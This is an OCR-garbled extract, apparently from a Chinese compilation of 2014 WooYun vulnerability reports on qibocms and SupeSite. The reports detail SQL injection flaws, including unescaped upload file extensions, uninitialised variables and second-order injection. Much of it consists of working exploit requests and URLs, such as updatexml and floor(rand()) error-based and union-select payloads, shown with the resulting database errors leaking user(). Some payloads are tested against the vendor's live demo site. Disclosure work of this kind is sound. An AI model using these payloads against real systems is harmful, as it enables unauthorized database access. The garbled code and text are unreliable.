`uid `, "username , ‘title’, “url”, “level” , “yz 


omepage/ pic/0//. 20140622160642. MSUyNw- -.jpg', 'O', 
",'1403424102', '0', '0'); «br» «br» You have an error in your 
SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near '.jpg', 
'homepage/pic/0// 20140622160642 MSUyNw- -.jpg', ‘0’, 
1403424102; oat line 1«br»1064«mstiyw wooyun org 


1 $^ Wm) os n AAN 


e="1'jpg" 


了 


*. Bim . “orderlist™ 村 WAEUES C, ",, s 





<?php phpinfo();?> 
一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 270883142628617 
Content-Disposition: form-data; name="action" 





一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 270883142628617 
Content-Disposition: form-data; name="ss" 


报错 了 构造 一 下 语句 。 








qibob2b%2rhy%2rchoose_pic.php%3t; explres=1ue, 1/-Jun-2014 


----------------------------- 24464570528145 06:22:16 GMT; path=/ 
Content-Disposition: form-data; name="postfile"; Set-Cookie: IF_upfile= 1402899736 
‘jlename="200',user(), 1.1, 1, 1, 1, D# jpg" Content-Length: 351 

Content-Type: text/plain 1 Content-Type: text/html; charset=gb2312 


«meta http-equiv="Content-Type" content - "text/html; 
C——————— 24464570528145 charset=gb2312" /> «script» 
Content-Disposition: form-data; name="psid" 


23 
-一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 24464570528145 parent.set choooooooooooosed('22','http:/ /web.com/qibob2 
Content-Disposition: form-data; name- "action" b/upload files /homepage/ pic/ 1/40/40. 20140616140616 Mj 
AwJTI2JTIzZMzkIMOIIMk 
1pload WWW.WoOoyun.org 
33 、 ys > Æ 、 ^R DOE E. 
这 里 限制 了 后 级 必须 为 jpg 之 类 的 所 以 在 文件 名 的 后 面 还 是 需要 加 一 个 这 个 。 
qr1a» 
— 






<li style="float:left; width:100px; height:100px; word-wrap: break-word; word-breal: normal; text-aligzn:kenter; n 

<a href=" javascript: ^Ximg src-"http://down. gibosoft. com/other/testv6/upload_files//root@localhost. gif” |style="t 
</li> 

He www.wooyun.org 


直接 查看 源码 得 到 数据 。 


`~ 


^n 


修复 方 


WooYun-2014-65837 : qibocms 黄页 系统 SQL 注入 一 枚 116 


WooYun-2014-79041 : Supesite 3 & i= A #2 
(Insert) 


" 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-079041 


简要 描述 


详细 说 明 
来 看 看 全 局 文件 
if(!(get_magic_quotes_gpc())) { 
$ GET = saddslashes($ GET); 


$ POST - saddslashes($ POST); 


$ COOKIE = saddslashes($ COOKIE); 


判断 gpc 是 否 开启 如 果 没 有 开启 就 对 get post cookie 转 义 
这 里 没有 对 files 转 义 。 


在 batch.upload.php 中 


elseif (!empty($ POST)) { // 如 果 POST 不 为 空 
// 编 辑 标 题 
if(!empty($ GET['editaid']) && $editaid = intval($_GET['editaic 


$editsubject = cutstr(trim(shtmlspecialchars($ POST['editsi 


END; 


updatetable('attachments', array('subject'=>$editsubject), 
print <<<END 

<script language="javascript"> 

var div = parent.document.getElementById("div upload " + $« 
var pf = parent.document.getElementById("phpframe"); 
pf.src = "about:blank"; 

div.innerHTML = "$editsubject"; 


</script> 


exit; 
j 
// 上 传 文件 
// 上 传 模式 
$mode = intval(postget('mode')); 
if($mode>3) exit; //mode 直接 让 他 为 空 
$hash = trim(preg replace("/[^a-z0-9N-N ]/i", '', trim($_POST[ 
if(strlen($hash) != 16) showresult($blang['unable to complete t! 
// A C 
$filecount - 1; 
$query = $ SGLOBAL['db']-»query('SELECT COUNT(*) FROM '.tname( 
$count = $ SGLOBAL['db']->result($query, 0); 
$allowmax = intval($ POST['uploadallowmax']); 


if($allowmax > © && $count + $filecount > $allowmax) showresult 


ed 


//X 
$allowtypearr = getallowtype(trim($ POST['uploadallowtype']));. 
// 空 间 


$attachsize = 0; 


include_once(S_ROOT.'./function/upload.func.php'); 
if(empty($mode)) { // 让 $mode 为 空 即 可 
// 本 地 上 传 
// 检 查 
$filearr = $_FILES['localfile'];// 获 取 files 
if(empty($filearr['size']) || empty(S$filearr['tmp name'])) 
$fileext = fileext($filearr['name']);// PEA 
if(!empty($allowtypearr)) { 
if(empty($allowtypearr[$fileext])) showresult($blang['t 
if($filearr['size'] > $allowtypearr[$fileext]['maxsize 
j 
// 缩 略图 
if(!empty($ POST['uploadthumbO']) && !empty($ SCONFIG['thur 
$thumbarr = $ SCONFIG['thumbarray'][$ POST['uploadthumt 
} else { 
$thumbarr = array($ POST['thumbwidth'], $ _POST[ 'thumbhe 
j 
// 上 传 
$newfilearr = savelocalfile($filearr, $thumbarr); 
if(empty($newfilearr['file'])) showresult($blang['uploadin: 
/ / BAB È 
if(empty($ POST['uploadsubjectO'])) $_POST[ 'uploadsubjectoO 
// T Mee X$linsert 3 P% 
$insertsqlarr = array( 
'uid' => $uid, 


'dateline' => $ SGLOBAL['timestamp'], 


'filename' => saddslashes($filearr['name']),// 对 文件 的 名 
'subject' => trim(shtmlspecialchars($_POST[ 'uploadsubje 
'attachtype' => $fileext,// 这 里 没有 对 文件 的 后 缓 转 义 
'isimage' => (in_array($fileext, array('jpg','jpeg','g: 
'size' => $filearr['size'], 
'filepath' => $newfilearr['file'], 
'thumbpath' => $newfilearr['thumb'], 
"hash' => $hash 
); 
inserttable('attachments', $insertsqlarr)//insert; 
id — | 
'filename' => saddslashes($filearr['name']) 在 查询 的 时 候 名 字 被 转 义 了 
'attachtype' => $fileext 来 看 一 下 $fileext 





$fileext = fileext($filearr['name']); 


function fileext($filename) { 


return strtolower(trim(substr(strrchr($filename, '.'), 1))); 


获取 点 以 后 的 没 做 转 义 所 以 可 以 在 后 组 这 进行 注入 了 。 


«br /> 
<b>User</b>: xiaoyutest<br /> 

‘974127529778 <b>Time</b>: 2014-10-7 6:28pm <br /> 
<b>Script</b>: /dan/supesite/batch.upload.php<br / > 
«br /> 


<b>SQL</b>: INSERT INTO [TableJattachments ( "uid `, 





329778 '1111111111111111?) «br /> 
h" <b>Error</b>: You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server 


version for the right syntax to use near '0', '18', 
:20779 '»0601A/107112 2001410071925» 91016&d4l attach’! " 


可 以 看 到 名 字 被 转 义 后 组 那 成 功 引 入 单 引 号 





it PHP 常见 漏洞 


APA —veuxvvur ULL/ZpAU INYA GV PU V IDSZV YICV EETPSLIZNU V UTATNDAOL S 
QCAA%3D%3D638eb521ba 
Content-Type: multipart/form-data; 

boundary» --------------------------- 974127529778 


‘| Content-Length: 490 


974127529778 
ontent-Disposition: form-data; name="localfile"; filename="1.jpg' and 


=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) 1, 1, 1,1, Ape" 
ontent-Type: text/html 





<?php phpinfo(y?» 

J ----------------------------- 974127529778 

| Content-Disposition: form-data; name="hash" 
1111111411111111 
----------------------------- 974127529778 
Content-Disposition: form-data; name -"uploadallowtype" 


Axx 


漏洞 证明 


PAU = UAW ULE epAU INYA TD SV PU V IDSZV YICV TETSLIZNU V UTANLNDAOL Y 
QCAA%3D%3D638eb52 1ba 
Content-Type: multipart/form-data; 

‘J boundary=--------------------------- 974127529778 


‘| Content-Length: 490 


974127529778 
ontent-Disposition: form-data; name="localfile"; filename="1,jpg' and 


-(updatexml(1,concat(0x5e24,(select user()) 0x5e24), 1)) 1, 1, 1, 1, ape" 
ontent-Type: text/html 





<?php phpinfo(y?» 
4 ----------------------------- 974127529778 
|Content-Disposition: form-data; name="hash" 


| 1111171111111111 
一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 974127529778 
Content-Disposition: form-data; name="uploadallowtype" 





arisen /> 
<br /> 

<b>User</b>: xiaoyutest«br /> 

<b>Time</b>: 2014-10-7 6:31pm «br /> 
«b»Script«/b»: /dan/supesite/batch.upload.php «br /> 






<b>SQL</b>: INSERT INTO [TableJattachments ( "uid `, 
"dateline^, "filename", “subject”, “attachtype’, 
"'isimage `, ‘size’, "filepath^, "thumbpath `, “hash `) 
VALUES ('13', 1412677892", '1.jpg V and 
l-(updatexml(1,concat(0x5e24,(select 
user(),0x5e24),1), 1,1, 1, 1, 1)", '1', ‘jpg’ and 
1-(updatexml(1,concat(0x5e24,(select 
user(),0x5e24),1),1,1,1, 1, 1£', '0', '18', 
'2014/10/13. 201410071831321fgkR.attach', ", 
'1111111111111111?) «br /> 
«b»Error«/b»: XPA syntax error: 
"^$rootélocalhost^$'«br /> 















«b»Errno.«/b»: 1105«/p» 


Laruiser [2 
«br /» 

<b>User</b>: xiaoyutest «br /> 

<b>Time</b>: 2014-10-7 6:31pm «br /> 
«b»Script«/b»: /dan/supesite/batch.upload.php «br /> 


<b>SQL</b>: INSERT INTO [TableJattachments ( "uid `, 
"dateline^, “filename”, “subject”, `attachtype `, 
"'isimage `, “size”, `filepath `, "'thumbpath `, “hash `) 
VALUES ('13', '1412677892', '1.jpg V and 
1=(updatexml(1,concat(0x5e24,(select 
user()),Ox5e24), 1), 1,1, 1, 1, D^, '1', 'jpg' and 
1-(updatexml(1,concat(0x5e24,(select 


user(),0x5e24),1),1,1,1, 1, 1)#", '0', '18', 
'2014/10/13. 201410071831321fgkR.attach', ", 
'1111111111111111?) «br /> 

<b>Error</b>: XPATH syntax error: 
"^$rootélocalhost^$'«br /> 

<b>Errno.</b>: 1105«/p» 


WooYun-2014-79041 : Supesite 前 全 注入 #2 (Insert) 121 


WooYun-2014-80867 : qibocms 地 方 门户 系统 注 
入 一 个 问题 (demo 测 会 ) 


" 
漏洞 作者 : ' 雨 。 V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-080867 


简要 描述 
一 周 4 个 小 时 的 假期 也 够 苦 的 。life5.qibosoft.com 听 说 一 般 应 用 。 注入 && 另外 一 
个 问题 。 


详细 说 明 


if(ereg("^([-. 0-9a-zA-Z]*)$",$ GET[jobs]))t{ 
// 不 读数 据 库 
if(is_file(dirname(__FILE__)."/../inc/job/$_GET[jobs].php")){ 
include(dirname(__FILE__)."/../inc/job/$_GET[jobs].php"); 
j 
jelseif(ereg("^([-. 0-9a-zA-Z]*)$",$ GET['job'])| Jereg("^([-. 0-9a-z/ 
// 读 数据 库 
require(dirname(__FILE__)."/"."global.php"); 
if(ereg("4([-_0-9a-ZA-Z]+)$",$job)&&is_file(ROOT_PATH."inc/job, 


include(ROOT PATH."inc/job/$job.php"); 





包含 文件 进来 。 


inc/job/ckreg.php 中 


}elseif($type=='yzimg'){ 
if($db->get_one("SELECT * FROM {$pre}yzimg WHERE $SQL imgnum='s 


die( "<img src-$webdb[www url]/images/default/check right.g: 


jelse( 


die("«img src-$webdb[www url]/images/default/check error.g: 





xj aay +] 


这 里 的 $SQL 并 没有 初始 化 , 结合 qibocms 的 全 局 机 制 可 以 直接 控制 这 个 变量 SRE 
Ao 





三 Load URL http: //12T. 0. 0. 1/dan/qibodf/ dof job. php? job-ckreg&type-yzimgéSQL-1-1 union select ((select 1 from (select 
th : count (k), concat ((user ()), floor (rand (0)*2))x from information schema. tables group by x)a))%23 
Ü Split URL 


D Execute 








[ ] Enable Post data Enable Referrer 











数据 座 连 接 出 错 : SELECT * FROM qb yzimg WHERE 1-1 union select ((select 1 from (select 


count (*), concat ( (user ()), floor (rand (0) *2)) x from information schema. tables group by x)a))# imgnum-'' AND 
sid=’ womsmdat’ 


Duplicate entry 'rootülocalhostl' for key 'group key 


1062 全 请 输入 正确 的 验证 码 


demo 测 会: 
http://**.**.**.**/do/job.php?job=ckreg&type=yzimg&SQL=1=1 union select 1%23 


数据 库 连 接 出 错 :SELECT * FROM life5 yzimg WHERE 1=1 union select 1# 
imgnum=" AND sid='1wmgh6ce' 


The used SELECT statements have a different number of columns 


1222 请 输入 正确 的 验证 码 


第 二 个 问题 


在 weimemberpost.php 中 


elseif ($action=="del" ) 

{ 
$rsdb=$db->get_one("SELECT B.*,A.* FROM ^($ pre}content~ A LEF 
if($rsdb[fid] !=$fidDB[fid]) { 


showerr ("#24 4 MÆ"); 


J 
if($rsdb[uid]!-$1fjuid&&!$web admin) 
t 

showerr ("4 Zirik"); 
} 


$db->query("DELETE FROM `{$_pre}jcontent ”WHERE id='$id' "); 
$db->query("DELETE FROM ^($ prejcontent 1' WHERE id='$id' "); 
$db->query("DELETE FROM ^($ pre)comments^ WHERE id='$id' "); 
keyword del($id,$rsdb['keywords']); 
sj 
keyword_del($id,$rsdb['keywords’]); 
这 里 是 出 库 来 的 所 以 能 引入 转 义 符 啥 的 。 





function keyword_del($id, $keyword) { 
global $db,$_pre; 
if(!$keyword) { 
return ; 
j 
$detail2-explode(" ",$keyword); 
foreach( $detail2 AS $key=>$value) { 
if ($value) { 
$db->query("UPDATE ~{$_pre}keyword > SET num=num-1 WHERE 
$ _rs=$db->get_one("SELECT kid,num FROM ^($ pre}keyword 
if($_rs[num]<1){ 
$db->query("DELETE FROM ~{$ prejkeyword' WHERE BIN/ 
j 
$kid-$ rs[kid]; 
$db->query("DELETE FROM ^($ prejkeywordid' WHERE ~ kid : 
d m m 
可 以 看 到 出 库 的 没 过 滤 再 一 次 带 入 到 查询 当中 





path: body > p 

关键 字 : [yuh 多 个 关键 词 , 用 空格 分 开 

dp: @ 网 络 文件 个 本 地 文件 
提 交 


首先 关键 字 中 写 一 些 特殊 字符 然后 入 库 


论 PHP 常见 漏洞 


xiaoyu 在 54 种 前 说 


asdasd 


然后 修改 。 
在 点 击 确认 。 


azn E 


四 评论 


发 布 信息 
修改 信息 
删除 本 文 


aaa aaa 





| 数据 库 连 接 出 错 :UPDATE "qb wei keyword SET num-num-1 WHERE BINARY “keywords” =’ yu’ V 









You have an error in your SQL syntax; 
yl? 


right syntax to use near 





check the manual that corresponds to your MySQL server version for the 
at line 1 


1064 数 据 库 连接 出 错 :SELECT kid, num FROM 'qb wei keyword WHERE BINARY “keywords =" yu’ V 


You have an error in your SQL syntax; 
ns ayes : 
yu V" at line 1 


right syntax to use near 


check the manual that corresponds to your MySQL server version for the 


1064 数 据 库 连接 出 错 :DELETE FROM 'qb wei keyword WHERE BINARY ~ keywords’ = yu V 


You have an error in your SQL syntax; 
DN He 5 
yu V" at line 1 


right syntax to use near 


1064 
出 库 造成 注入 。 


漏洞 十 明 


check the manual that corresponds to your MySQL server version for the 





三 Load URL http: //12T. 0. 0. 1/dan/qibodf/do/ job. php? job=ckreghtype=yzimgSSQL=1=1 union select ((select 1 from (select = 
Q Split URL count (k), concat ((user ()), floor (rand (0)*2))x from information schema. tables group by x)a)) 823 
i 


^, Execute 








[C Enable Post data 


O Enable Referrer 





数据 库 连 接 出 错 :SELECT * FROM qb yzimg WHERE 1-1 union select ((select 1 from (select 


count (5), concat {luser Q), floor (rand (0) *2))x from information schema. tables group by x)a))# imgnum="’ 


sid-' womsmdqt' 


AND 


Duplicate entry 'rootélocalhostl' for key 'zgroup key' 


1062 合 请 输入 正确 的 验证 码 


A ~ 
修复 方案 


第 一 个 初始 化 一 下 
第 二 个 出 库 转 义 。 


WooYun-2014-80867 : qibocms 地 方 门户 系统 注入 一 个 问题 (demo 测 试 ) 


126 


WooYun-2014-80870 : qibocms 地 方 门户 系统 注 
入 (多 处 类 似 ,demo 测 试 ) 


Y 

漏洞 作者 : ' 雨 。 V 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-080870 
简要 描述 

初始 化 啊 初始 化 。 

详细 说 明 

很 多 类 似 的 随便 找 个 地 方 把 。 


首先 注册 个 会 员 。 


在 dianping/post.php 中 


if ($action=="postnew" ) 
{ 
if ($webdb[ForbidPostMore]){ 
if ($db->get_one( "SELECT * FROM {$_pre}content WHERE uid='$: 


showerr(" 系 统 设置 每 人 只 能 发 布 一 个 商铺 1")， 


} 

if(!check rand num($ POST["$webdb[rand num inputname]"]))( 
showerr(" 系 统 随 机 码 失 效 , 请 返回 ,刷新 一 下 页 面 ,再 重新 输入 数据 ,重新 提交 

} 

if(!$postdb[city_id])f{ 
showerr(" 请 选择 城市 " ) ; 

j 

/* 验 证 码 处 理 */ 

if ($webdb[Info_GroupPostYzImg |&&in_array($groupdb[ 'gid'], exploc 
if (!$web_admin&&! check_imgnum($yzimg) ) { 


showerr(" 验 证 码 不 符合 ,发 布 失败 ") ; 


j 
$postdb['list']-$timestamp; 
if($iftop){ // 推 荐 置顶 
@Qextract($db->get_one( "SELECT COUNT(*) AS NUM FROM ^[$ pre: 
d —— NE 
让 哥 来 发 布 个 点 评 。 


@extract($db->get_one("SELECT COUNT(*) AS NUM FROM 
{$_pre}content$_erp WHERE list»'$timestamp' AND fid='$fid' AND 
city id-'$postdb[city id]")) 





来 看 看 这 个 语句 。 ($ prejcontent$ erp 来 看 看 这 个 文件 中 的 $_erp 哪 里 来 的 














Search“$_erp” (13 hits in 1 file) 










D:XApaSe ^ 
Line 173 @extract ($db->get_one (“SELECT COUNT(x) AS NUM FROM 
Line 187 $ erp-$Fid db[tableid][$fid]: 
Line 314:  $db-^query( INSERT INTO  [$ prelcontent$ erp (id, title , mid , fid , fname, info , ' hits  , ‘comments , pou. 





'[$ prelcontent$ erp! WHERE list>’ $timestamp’ AND fid-'$fid' AND city. 








Line 378: $_erp=$Fid_db[tableid] [$fid] ; 

Line 379: = $rsdb=$db->get_one (“SELECT A. *,B.* FROM ` [$ prelcontent$ erp A LEFT JOIN ` [$ prelcontent $fidDB[mid] B ON A.id=B.id vani. 

Line 394: del info($id,$ erp,$rsdb): 

Line 409: —$ erp-$Fid db[tableid][$fid]: 1 

Line 410: $rsdb=$db->get one("SELECT B.*,A.* FROM ` {$ prelcontent$ erp A LEFT JOIN ^ {$ pre}content $fidDB[mid] B ON A. id=B. id WHERE A% 
> 





< 
PHP Hypertext Preprocessor file length : 30291 lines : 914 Ln : 159 Col : 2T Sel: 010 Dos\Windows GB2312 Gimp ee 


可 以 看 到 我 们 的 这 个 语句 位 于 173 行 。 
而 对 $_erp 赋值 是 在 187 行 。 那 么 相当 于 我 们 173 行 的 这 个 $_erp 就 没有 初始 化 了 。 


结合 qibocms 伪 全 局 机 制 那么 我 们 就 可 以 控制 173 行 的 这 个 $_erp 来 达到 注入 的 效 
果 o 


dianping/post.php? 
action=postnew&fid=11 &postdb[address]=xx&postdb|[city_id]=x&_erp=aaa&iftop= 
1&yzimg=a1 df 








dj Load URL | http://127.0.0. 1/dan/qibod£/di anping/post. php? acti on=postnewhfi d=11épostdb [address ]=xxdpostdb [ci ty_id]=x4_erp=aaaii ftop-l&yzimgcaldf 
Q Split URL 
» Fxecute 
[C] Enable Post data [| Enable Referrer 
数据 库 连 接 出 错 : SELECT COUNT(*) AS NUM FROM 'qb dianping contentaaa WHERE list>’ 1414312867’ AND fid= 11 AND city id-'x' 


Table 'qgibodf.qb dianping contentaaa' doesn't exist 
1146 


J 








w) Load URL http: //127. 0.0. 1/dan/qibodf/dianping/post. php?action-postnew&fid-ll&postdb[address]-xxépostdb[city id]-x& erp= where 1=1 and (select 1 from 
m $ (select count(*), concat ((select user ()), floor (rand (0)*2))x from information schema. tables group by x)a)%23&iftop=lĝyzimg=x39a 

Ü Split URL 

D 


Execute 


[C] Enable Post data [] Enable Referrer 


数据 库 连 接 出 错 : SELECT COUNT(*) AS NUM FROM qb_dianping_content where 1-1 and (select 1 from (select count (x), concat ( (select 
user ()), floor (rand(0)*2))x from information schema.tables group by x)a)& WHERE list>’ 1414313205’ AND fid-'11' AND city id-'x' 








Duplicate entry ’ root@localhost1’ for key 'group key' 
1062 
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ib PHP 


测 试 demo o 









































INT v| œ $ SQLr XSS- Encryption" Encoding: Üther- 
4m) Load URL | http: //1ifeS. gibosoft. com/di anping/post. php?action-postnew&fid-ll&postdb[address]-xx&postdb[city id]-x& erp= union select yuN23&iftop-l&yzimg-a853 E 
Q Split URL + 
| 
^; Execute | 
[C] Enable Post data [] Enable Referrer 
数据 库 连接 出 错 :SELECT COUNT (+) AS NUM FROM ‘lifeS_dianping content union select yu# WHERE list? 1414313773’ AND fid-'11' AND city_id=’x’ ^ 
Unknown column yu in’ field list’ 
1054 
Qibosoft Jcom meses ' = f 
CA Ke SOHA 8 网 站 首页 | 会 员 中 心 ; 退出 
我 的 资料 
9H o 
IN 
^ M = 
D ， [一 
He WI aE PA 
三 Load URL http: //127. 0. 0. 1/dan/qibodf/ di anping/post. php?action-postnew&fid-ll&postdb[address]-xxépostdb[city id]-x& erp= where 1=1 and (select 1 from 
a (select count(k), concat ((select user ()), floor (rand (0)*k2))x from information schema. tables group by x)a)W238iftop-l&yrzimg-x39a 
Ü Split URL 
» Execute 
[C] Enable Post data [ Enable Referrer 
数据 库 连 接 出 错 : SELECT COUNT(«) AS NUM FROM 'qb dianping content where 1=1 and (select 1 from (select count (*), concat ( (select 
user()),floor(rand(0)*2))x from information schema.tables group by x)a)# WHERE list>’ 1414313205’ AND fid-'11' AND city id-'x' 
Duplicate entry 'rootGlocalhostl' for key 'group key 
1062 
. 国内 领 外 的 开源 系统 
Qibosoft Icom HA | 
Co ME 数 以 万 计 的 用 户 在 全 用 网 站 首页 | 会 员 中 心 | 退出 
我 的 资料 
€ > 
€ > 
€ > 
> hki 
系统 设置 不 能 从 外 部 提交 数据 
xiaoyu 
e 9 
€ > - 
e 3 级 别 : YIP 会 员 
A ~ 
修复 方案 
T N 
. . " ` cL 
4& $ erp-$Fid db[tableid][$fid]; 放 在 前 面 。 
Viin_oN1A_QNATN * mik Z hk 4207 
oYun-2014-80870 : qib 、( 多 处 30 








WooYun-2014-79938 : 齐 博 地 方 门 户 系统 SQL 注 
入 漏洞 (无 需 登 录 可 批量 ) 


Y 
漏洞 作者 : phithOn V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-079938 


简要 描述 

我 发 现 齐 博 在 一 般 应 用 列表 里 呢 ， 好 期 待 ~ 齐 博 地 方 门 户 无 源码 ， 测 试 可 以 上 官网 
的 演示 站 : http://life.qibosoft.com 进行 测试 。 

详细 说 明 

问题 出 在 齐 博 搜索 的 位 置 ， 也 就 是 : http://**.**.**.**/coupon/s.php 


if ($action=="search") { 
if (!$webdb[Info_allowGuesSearch]&&! $1fjid) { 
//showerr (35 4 X"); 
j 
$keyword-trim($keyword); 
$keyword=str_replace("%", '\%', $keyword) ; 
$keyword-str replace(" ",'N ',$keyword); 
if (!$keyword) { 
showerr(' 关 键 字 不 能 为 空 1' )， 
} 
$rows=10; 
if(!$page){ 


$page=1; 


$min=($page-1)*$rows; 
$type = ($type=='username') ? $type : "title"; 
if($fid){ 
$querys = $db->query("SELECT fid FROM {$_pre}sort WHERE ‘fl 
while($rs = $db->fetch_array($querys)){ 
$fids[]=$rs[fid]; 
} 
$fids=implode(",",$fids); 
if ($fids) { 
$sql fid = " AND `fid` IN($fids) "; 
jelse( 
$sql fid = " AND '"fid'-'$fid' "; 
j 
jelse( 


$sql fid = ""; 


K = n 





代码 如 上 9 这 个 注入 之 所 以 不 需要 登录 o Oo O 是 因为 源码 里 把 showerr(" 请 先 登 录 "); 
注释 掉 了 ， 不 知道 为 何 。 


继续 往 下 看 ， 看 到 这 个 while 语 名 : 
while($rs = $db->fetch_array($querys)){ 
$fids[]-$rs[fid]; 

} 


查询 出 来 fid， 将 $fid 放 进 $fids 数 组 中 。 之 后 用 implode 将 $fids 数 组 变 成 字符 串 ， 放 进 
INF v > INF 4) FRA 3E $1] FRA o 


看 起 来 没 问题 ， 因 为 $fids 是 $rs[fid] 组 成 的 数组 。 但 这 里 很 重要 的 是 ， 了 解 齐 博 的 都 
知道 ， 齐 博 在 inc/common.inc.php 中 有 这 样 一 段 : 


foreach($ COOKIE AS $ key=>$ value)( 
unset($$ key); 
j 
foreach($ POST AS $ key-»$ value)( 
lereg("^N [A-Z]*",$ key) && $$ key-$ POST[S$ key]; 
j 
foreach($ GET AS $ key=>$ value)( 


lereg("^N [A-Z]*",$ key) && $$ key-$ GET[S$ key]; 


等 于 说 将 $_GET/$_POST/$_COOKIE 注 册 成 全 局 变量 了 。 所 以 $fids 的 初 值 我 们 是 
可 以 控制 的 ， 这 个 while 语 句 前 也 没有 清除 $fids， 只 是 往 这 个 数组 里 加 $fid < 


最 后 导致 了 注入 。 


我 们 可 以 看 看 演示 站 : 


http://**.**.**.**/coupon/s.php?action=search&keyword=11&f id=1&F id: 


http://**.**.**.**/coupon/s.php?action=search&keyword=11&f id=1&F id: 
TENEM 





fy i] LE 8] 


http://**.**,**.**/coupon/s.php?action=search&keyword=11&f id=1&F ids 
SS SS ee 





T R-RE -FDATA F 





^ life.qibosoft.com/coupon/s.php?actionz search&keyword-11&fid-1&fids[]-0) union select user(),2,3,4,5,6,7,8,99623 
注册 | 登录 
© 搜索 一 一 一 一 一 一 一 一 新 闻 资 讯 | 分 类 团购 招聘 | 礼品 
搜 到 1 =e 《用 时 

« 隐藏 则 边栏 
> KBE vi_life@localhost 

时 尚 购物 IA ER 1970-01-01 08:00 发 布 所 在 栏目 : 9 

EUGÉR 

| 机 Ri x 
inar 


文 个 洞 利用 简单 ， 无 需 登 录 ， 可 以 批量 。 


http://**.**,**.**/coupon/s.php?action=search&keyword=11&f id=1&F ids 
http://**.**,**.**/coupon/s.php?action=search&keyword=11&f id=1&F id: 
http://**.**.**.**/coupon/s.php?action=search&keyword=11&f id=1&F id: 
http://**.**,**.**/coupon/s.php?action=search&keyword=11&f id=1&F ids 
http://**.**,**.**/coupon/s.php?action=search&keyword=11&f id=1&F ids 
http://**.**,**.**//coupon/s.php?action=search&keyword=11&Fid=1&Fic 
http://**.**,**.**/coupon/s.php?action=search&keyword=11&f id=1&F ids: 
http://**.**,**,**/coupon/s.php?action-search&keyword-11&fid-1&fid: 
[S penc LLL S] 
re 还 有 太 多 ， 不 列 了 ， 默 默 笑 了 ， 这 种 拿 去 做 * 产 最 好 了 ， 可 惜 我 是 个 正直 的 人 ~ 





4A oD us 
修复 方案 


unset($fids); 之 后 再 进入 While 循环 。 


WooYun-2014-80259 : 齐 博 整 站 /地 方 门 户 SQL 注 


入 漏洞 


Y 
漏洞 作者 : phithOn V 
来 源 : http://www.wooyun.org/bugs/wooyun-2014-080259 


简要 描述 


继 ues 079938 后 第 二 发 ， 依 昌 


注 ， 绝 不 鸡肋 。 看 看 乌云 的 奖励 怎么 样 ， 好 的 话 还 AR 第 三 发 。 
详细 说 明 


一 个 比较 有 意思 的 点 ， 因 为 安全 策略 造成 的 注入 。 

就 拿 齐 博 整 站 系统 为 例 。 

看 到 /memberuserinfo.php，112 到 114 行 : 
// 过 滤 不 健康 的 字 
$truename=replace_bad_word($truename) ; 
$introduce=replace_bad_word($introduce); 


$address-replace bad word($address); 


这 几 句 过 滤 代 码 ， 意 思 是 想 过 滤 一 些 “ 不 和 谐 " 的 词语 。 那 我 们 看 看 这 


replace bad word 函 数 。 


是 直接 注入 非 育 


function replace_bad_word($str){ 
global $Limitword; 
Qinclude once(ROOT PATH."data/limitword.php"); 
foreach( $Limitword AS $o0ld=>$new) { 
strlen($o0ld)>2 && $str=str_replace($old, trim($new),$str); 
j 
return $str; 
j 
| ——————ÓÓyuÁÀ: A) 
实际 上 是 一 个 str_replace， 将 日 的 “不 和 谐 " 词 语 替 换 成 新 的 和谐" 词语。 那么 替换 列 
表 从 哪 来 ?看 看 datallimitword.php : 
<?php 
$Limitword[' 造 反 ']=' 造 **'， 


$Limitword[' 法 轮 功 ']=' 法 ** 功 '， 


就 这 两 个 ，$Limitword 并 没有 初 值 。 而 且 include 之 前 有 global $Limitword。 齐 博 
cms 是 将 GET 和 POST 变量 注册 成 全 局 变量 了 ， 所 以 global 取 到 的 可 以 是 
$_POSTILimitword] 或 $_ GETILimitword]。 也 就 是 说 $Limitword 是 我 们 可 以 控制 
的 。 


也 就 是 说 ， 我 们 可 以 控制 str Salen Ace e 不 知道 还 有 没有 人 记得 
ecshop 曾 经 的 一 个 注入 漏洞 (http://**.**.**.**/content/2700) ， 原 理 相同 ， 我 再 说 
一 遍 5 


某 变 量 $str 全 局 做 过 转 义 ， 导 致 %00 转 义 成 了 \0. 我 们 能 够 控制 str_replace 的 前 两 个 
参数 ， 则 str_replace('0', ", $str) > > 再 将 0 转换 成 空 ， 则 留 下 了 \， 这 个 \ 可 以 转 义 其 后 
的 w， 使 之 变 成 w， 导 致 单 引号 逃逸 出 转 义 符 的 限制 ， 造 成 注入 。 


这 里 的 原理 是 一 样 的 ， 只 不 过 齐 博 cms 之 前 对 一 些 变量 做 了 过 滤 : 


$truename=filtrate($truename ; 
$idcard=filtrate($idcard); 
$telephone=filtrate($telephone) ; 
$address=filtrate($address); 
$introduce-filtrate($introduce); 
$homepage=filtrate($homepage) ; 
function filtrate($msg) { 
//$msg = str_replace('&', '&amp;', $msg); 
//$msg = str_replace(' ', '&nbsp;',$msg); 
$msg = str_replace('"', '&quot;',$msg); 
$msg = str_replace("'", '&#39;',$msg); 
$msg = str replace("«","&1t;",$msg); 
$msg = str_replace(">","&gt;",$msg); 
$msg = str_replace("\t"," &nbsp; &nbsp;",$msg); 
//$msg = str_replace("\r","",$msg); 
$msg = str_replace(" "," &nbsp; ",$msg); 


return $msg; 


将 ' 等 敏感 字符 过 滤 了 。 就 算 有 一 个 \ 可 以 转 义 一 个 '， 但 是 这 里 连 ' 都 引入 不 了 。 
没关系 ， 这 个 文件 是 更 新 用 户 信息 用 的 ， 执 行 的 语句 类 似 update table set 
a-'111',b2222' where uid=1， 我 们 引入 一 个 \ 在 111 的 最 后 ， 转 义 掉 111 后 面 的 引 

号 ， 这 样 222 就 逃 选 出 了 了 有 限制， 我 们 的 sq| 注 入 语句 就 可 以 放 在 222 的 位 置 执行 了 。 
